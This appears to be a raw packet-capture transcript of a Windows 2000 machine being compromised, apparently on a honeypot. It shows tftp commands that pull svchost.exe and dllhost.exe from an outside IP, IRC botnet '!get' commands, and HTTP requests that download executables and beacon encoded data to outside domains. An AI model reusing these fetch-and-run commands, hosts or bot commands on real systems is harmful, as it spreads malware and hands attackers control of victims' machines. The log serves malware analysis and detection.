VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> VICTIM: dir wins\\dllhost.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> VICTIM: dir dllcache\\tftpd.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> VICTIM: tftp -i 70.182.94.31 get svchost.exe wins\\SVCHOST.EXE VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000: VICTIM: Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: tftp -i 70.182.94.31 get dllhost.exe wins\\DLLHOST.EXE VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: Transfer successful: 19968 bytes in 2 seconds, 9984 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: wins\\DLLHOST.EXE VICTIM: NICK apbatauhUSER w020500 . . :- VICTIM: Service Pack 2JOIN &virtu ATTACKER: :u. PRIVMSG apbatauh :!get http:/ad.ghura.pl/rc.exe:u. PRIVMSG apbatauh :!get http:/bb.iwillhavebigdick.com/kp.exe:u. PRIVMSG apbatauh :!get http:/www.derquda.com/kb8.txt VICTIM: GET /rc.exe HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache ATTACKER: GET /kb8.txt HTTP/1.0User-Agent: DownloadHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/mno3.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/lmn2.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/klm1.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/nop4.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /list.php?c=7E663DEA388E12BED83F7A52ECA9FB2A48D1E0DBCEEA55C97F4DB5FD218D241FF9C7D3CE691EAEC0750C4BD17C393E1CA8524EB9DCA522733246&v=2&t=0.6229822 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /upload/int.exe?t=0.1742517 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: anotherdomainname.inConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=A2BCD733B020EA7560904272BDF61ADA0B93CCF6BF9B77BF0A6CD098F22A5D77166BB1A780EF614C407CCBB9A29EE50236FFAA4209A9E9CAC2F67A0D7C03245693DCBF1AC21A54CB407A463CC22CD20D8A7D5C61E997696FE1433D50CC2668112A7BCFDE0F2FF659C07391168585A63CB94ECEE198DF4B6C6A331679EC5A0EB02D27EE463F12BE786158C7969452661D&t=0.8770105 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=5E4043A74DDD30AFF606083897DCC8080D95655FDBFF2FE781E74E068A521F35F18C7A6CD1BE29047D41186A754905E2CD04BE5601A127045561A2D5245B92E0D7980CA9558DF16E29130B71B856E43B38CF675A453B989E4DEFD8B527CD9AE38FDE75646242ED42C97A6FF9B94059D16E9BFFA1CF9C0736DACE9DE88C2E4BB1DBCB73DFC2F6C1007041114411D99B1BD132&t=1.629275E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /1.exe?t=0.7933924 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 109.196.143.133Connection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=C2DCAC4851C167C6879FB79E661FCA0EB7295234496C3FF73E0E5226D07D577F3248FD197737AA86A1C6BFD64A40263E8C411EF90673A6833302F0597B02C6B493EECCBF34E0F6692E14BEC45AB4CE110AFD3F02D6A8A1A7FC5E6409B65C552C26775544D2F272DDBF0C0186AFAF78E212E5103FA3E47651CA9319763A8CD8666C6816BDD9EC8142251F1547A1601A67&t=0.5662195 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=FFE1D3375CCC62C361796148D9A0BB7F27B9E187280DA46C2D1DCCB8AD007D55A2D8A84CAAEA163A690EDAB3BDB72038BF72BC5BAADFE2C71F2EEF465B222D5F621FF28125F1920D2B11F48E4DA3D20D8275E7DACBB59690BF1DD6BB4EA46118AAFB786980A0C26DE05305938A73CE46798C4816DB88CDFFE7F3F683258734CE21313E95A99CD3170132A1F9B576502FEB30&t=0.9606287 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /tm/cry.exe?t=0.8272058 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: www.derquda.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=554BEA0EDF4F5586A14FA29320589651148EE781B9A6D7106C0DCE8977AE83A9F9B4B8A24A7497B8516631409C97AA4D448E18A6E1922A08137600A970D9E848DC92D77F9191D7485963C5BFD73910CFCA3D576AB0CE1A1C3092DDB03AD06910BCED10015878248B8734F97E05052BB183740E21E9AE597EB2EB9DF22A9C06B8969D6EC885B6D117E8D1A3F29D5A9CE3&t=0.9535486 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=031D977376E677A44AA438096B134F88E17B5D3B839CB572E2830443CE174B61F5B8859F5C62B49BC6F12E5F4F4454B3B77D2A943447587AD1B4A70E943DF757014F379FC5C5F76881BB770D06E872AD9463EFD2CBB5DADC76D43A5756BC3B4293C2677687A7C06FF7449E08F50C79F106F307593D6E5B696D79E7929A38897358480CA4B798D116E5D36C3EC1077A04&t=0.6925623 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /333.exe?t=0.5942957 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: star7.inConnection: Keep-AlivePragma: no-cache ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu